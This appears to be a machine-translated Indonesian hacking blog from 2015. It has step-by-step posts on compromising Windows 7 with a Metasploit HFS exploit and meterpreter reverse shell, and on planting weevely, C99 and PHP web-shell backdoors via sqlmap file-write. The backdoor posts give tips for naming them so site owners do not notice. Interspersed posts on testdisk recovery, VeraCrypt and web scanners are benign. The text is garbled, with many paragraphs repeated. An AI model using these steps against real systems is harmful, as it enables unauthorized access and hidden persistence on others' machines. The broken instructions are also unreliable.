Minggu, 06 September 2015
HOW TO HACK WINDOWS 7
1. First we need to know is the target of the IP addresses it can we get when carrying out IG (Information Gathering)
2. after we know our targets nuka IP terminal and typing the command "ip nmap -A target"
then enter it will show a gap which could be executed.
3. then go to metasploit using "msfconsole"
4. then we choose to use the exploit which one? here I will use the "msf> use exploit / windows / http / rejetto_hfs_exec"
5. after it was set to be used payload type the command "set payload windows / meterpreter / reverse_tcp"
6. and then type the command "exploit"
7. then after appearing "meterpreter>" then you are logged into Windows 7
The next whatever you want anything there .... now it's yours windows
Sabtu, 05 September 2015
Recovery back the data on the Flasdisk that has been erased
on this occasion I will discuss about how to recover data that has been deleted in data storage, such as flasdisk, external hard drive and the other:
1. we open a terminal and type the command "testdisk / dev / sdc" sdc here is usb who want me to appear back data.
2. after appearing command enter "proceeds" press enter "and then select" intel "press enter and then select" analyze "and then select the command" quick search "answer yes and continue
3. then press the "P" to see the list that never erased
4. then select the file you want in recavery press "c" and select where to save it and then press the "c" back
5. after the command "copy done" look back to the place where you store.
Thus was cursory knowledge that I share today Morning All
1. we open a terminal and type the command "testdisk / dev / sdc" sdc here is usb who want me to appear back data.
2. after appearing command enter "proceeds" press enter "and then select" intel "press enter and then select" analyze "and then select the command" quick search "answer yes and continue
3. then press the "P" to see the list that never erased
4. then select the file you want in recavery press "c" and select where to save it and then press the "c" back
5. after the command "copy done" look back to the place where you store.
Thus was cursory knowledge that I share today Morning All
Jumat, 04 September 2015
How Do We Secure Data
to anticipate when a laptop or flash or hard drive is stolen or fall and we are in it no confidential data so it's good we do our security by encrypting data.
1. First we download via google apps veracript
2. then after the download extract and install.
3. the following command to menjalanjan "./veracrypt-1.13-setup-gui-x86"
4. if the terminal ask permission then type the following command:
"root @ times: ~ / Downloads chmod 777 veracrypt-1:13-setup-gui-x86"
5. then repeat the command to run veracrypt
"root @ times: ~ / Downloads # ./veracrypt-1.13-setup-gui-x86"
6. The following command will display "
"Verifying archive integrity ... All good.
Uncompressing VeraCrypt 1:13 Installer .. "
1. First we download via google apps veracript
2. then after the download extract and install.
3. the following command to menjalanjan "./veracrypt-1.13-setup-gui-x86"
4. if the terminal ask permission then type the following command:
"root @ times: ~ / Downloads chmod 777 veracrypt-1:13-setup-gui-x86"
5. then repeat the command to run veracrypt
"root @ times: ~ / Downloads # ./veracrypt-1.13-setup-gui-x86"
6. The following command will display "
"Verifying archive integrity ... All good.
Uncompressing VeraCrypt 1:13 Installer .. "
7. after the run then just follow the steps on the screen of your laptop monitor.
Kamis, 03 September 2015
Create a backdoor by using weevely, insert into the target web and backdoor access through the terminal
Once Backdoor C99.php we upload to the web, now we will try to insert a php script that we make with weevely into the web and hide it in php files belonging to the target web.
1. Create a file using the backdoor php weevely with the following command:
# Weevely generate 1234 silentbd.php
1. Create a file using the backdoor php weevely with the following command:
# Weevely generate 1234 silentbd.php
2. Copy the script that is in the php file that we created earlier in the php file that is in the target web,here I will try to insert the script in the view_source_all.php file in the web directory.
Then the backdoor access through the terminal with the following command:
# Weevely http: // web ipaddres target / folder / name backdoor password
# Weevely http://192.168.1.123/dvwa/vulnerabelity/silentdb.php 1234
easy does not it? yes of course easier if you are willing to learn and read more certainly will be more stable
Upload Backdoor using sqlmap
Here I will give you a little lesson to install a backdoor file using sqlmap.
1. The first is whether to copy the URL belongs to the target, here when the target URL using GET metod we can directly copy, however when using POST metod we use burpsuite prior notice.
2. We will try to install a backdoor on the web dvwa using backdoor file is available in the directory:
# cd /usr/share/webshell/php/php-backdoor.php
then move the file to the root directory
#cp php-backdoor.php / root /
3. We will install a backdoor file which we prepared earlier in the web with the command:
# sqlmap /root/dvwa.txt -l -p "id" --file-write = / root / php-backdoor.php --file-dest = / var / www / dvwa / hackable / uploads / php-backdoor. php
and if it appears like the image above means you have succeeded in planting a backdoor
1. The first is whether to copy the URL belongs to the target, here when the target URL using GET metod we can directly copy, however when using POST metod we use burpsuite prior notice.
# cd /usr/share/webshell/php/php-backdoor.php
then move the file to the root directory
#cp php-backdoor.php / root /
3. We will install a backdoor file which we prepared earlier in the web with the command:
# sqlmap /root/dvwa.txt -l -p "id" --file-write = / root / php-backdoor.php --file-dest = / var / www / dvwa / hackable / uploads / php-backdoor. php
and if it appears like the image above means you have succeeded in planting a backdoor
Upload Backdoor C99.php of backdoor that you have uploaded to the web.
to do this we first entered http://r57shell.net/ website for downloading one file backdoor, which will be used.
1 . Download the file from the internet c99.pnp.rar, then extract the file, rename it according to our wishes, but must be with an appropriate name so as not suspicious, then move the file into the root directory
2. Through the first backdoor we will upload backdoor c99.php, specify where the file will be put
3. I will put the file c99.php in dvwa directory on the web. Once the file is uploaded and then try to access the file on the web.
and finally a second backdoor can we enter into a website but do not forget to menyaarkan his name so as not to be discovered the owner
1 . Download the file from the internet c99.pnp.rar, then extract the file, rename it according to our wishes, but must be with an appropriate name so as not suspicious, then move the file into the root directory
2. Through the first backdoor we will upload backdoor c99.php, specify where the file will be put
3. I will put the file c99.php in dvwa directory on the web. Once the file is uploaded and then try to access the file on the web.
Rabu, 02 September 2015
Scanning web by using multiple applications
1. BURP SUITE
Run Bruphsuit in order to see the parameters that runs on the web, after getting the parameters sent to the tool spider, the spider is a useful tool to scan any link contained in a web in order to find security holes that we can use.
repeater function to analyze links that are
on the web without having to repeat intercept many times.
2. DIRBUSTER
Dirbuster application serves to locate the folder contained in a web that has a security vulnerability that can be used as a place to put the backdoor.
3. NIKTO
Nikto useful application to scan the web as a whole regardless of the web is built using terentu application.
Langganan:
Komentar (Atom)